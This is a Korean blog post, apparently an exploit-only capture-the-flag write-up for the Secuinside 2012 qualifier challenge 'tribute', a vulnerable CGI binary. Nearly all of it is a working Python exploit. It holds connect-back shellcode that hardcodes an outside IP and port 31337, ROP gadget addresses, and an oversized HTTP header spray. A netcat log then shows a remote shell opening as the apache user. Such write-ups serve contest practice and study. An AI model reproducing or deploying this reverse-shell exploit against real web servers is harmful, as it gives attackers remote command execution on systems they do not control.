Category : Pwnables

nickname: tribute

 

HINT: http://61.42.25.18/banking/

 

binary: http://61.42.25.18/banking/secureKey.tgz

 

CentOS 6.2 / randomize_va_space 2 / exec-shield 0


secureKey.cgi

Summary : invalid use of the index




#!/usr/bin/python

from socket import *
from struct import pack

HOST = "127.0.0.1"
PORT = 80

p = lambda x : pack("<L" , x)

SHELLCODE = "\x90"*16 + "\x31\xc9\x31\xdb\x31\xc0\xb0\x66\x53\x43\x53\x43\x53\x4b\x89\xe1\xcd\x80"+\
"\x88\xc3\xb0\x66\x51\x51\x68\x6e\x08\xe7\x1f\x66\x68\x7a\x69\x66\x6a\x02"+\
"\x89\xe2\x6a\x10\x52\x53\xb3\x03\x89\xe1\xcd\x80\xb0\x3f\x31\xc9\xcd\x80"+\
"\xb0\x3f\x41\xb0\x3f\x41\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68" +\
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"


call_eax = 0x0804878B
getenv_plt = 0x08048608
env = 0x08049943
ret = 0x080487B5

data = p(ret)*1997 + p(getenv_plt) + p(call_eax) + p(env) + "\x90"*(100-len(SHELLCODE))+SHELLCODE+"\r\n"

payload = ""
payload += "GET" + "\x5b\x5b\x5b\xff\xe4" + " /cgi-bin/tribute/secureKey.cgi?n=[BACK]&k= HTTP/1.0" + "\r\n"
payload += "aba:"+data
payload += "abc:"+data 
payload += "abd:"+data
payload += "abe:"+data
payload += "abf:"+data
payload += "abg:"+data
payload += "abh:"+data
payload += "abi:"+data
payload += "abj:"+data
payload += "abk:"+data
payload += "abl:"+data
payload += "p:pwn"+"\r\n"
payload += "\r\n\r\n"


s = socket(AF_INET , SOCK_STREAM)
s.connect((HOST , PORT))
s.send(payload)
print s.recv(1024)

s.close()

 

 

pwn3r@localhost:~/secuinside/quals/tribute$ ./exploit.py & nc -lvp 31337
listening on [any] 31337 ..
connect to [           ] from (UNKNOWN) [          ] 39172
id 1>&2
uid=48(apache) gid=48(apache) groups=48(apache) context=unconfined_u:system_r:httpd_sys_script_t:s0


저작자표시 (새창열림)

'CTF' 카테고리의 다른 글

Secuinside 2012 Quals - Classico (Exploit only)  (0) 2012.10.07
Secuinside 2012 Quals - Roadie (Exploit only)  (0) 2012.10.07
Secuinside 2012 Quals - Dethstarr (Exploit only)  (0) 2012.10.07
2011 Holy-Shield Hacking Festival Report  (4) 2011.11.29
ISEC 2010 본선 CTF - sonic  (0) 2011.10.14

티스토리툴바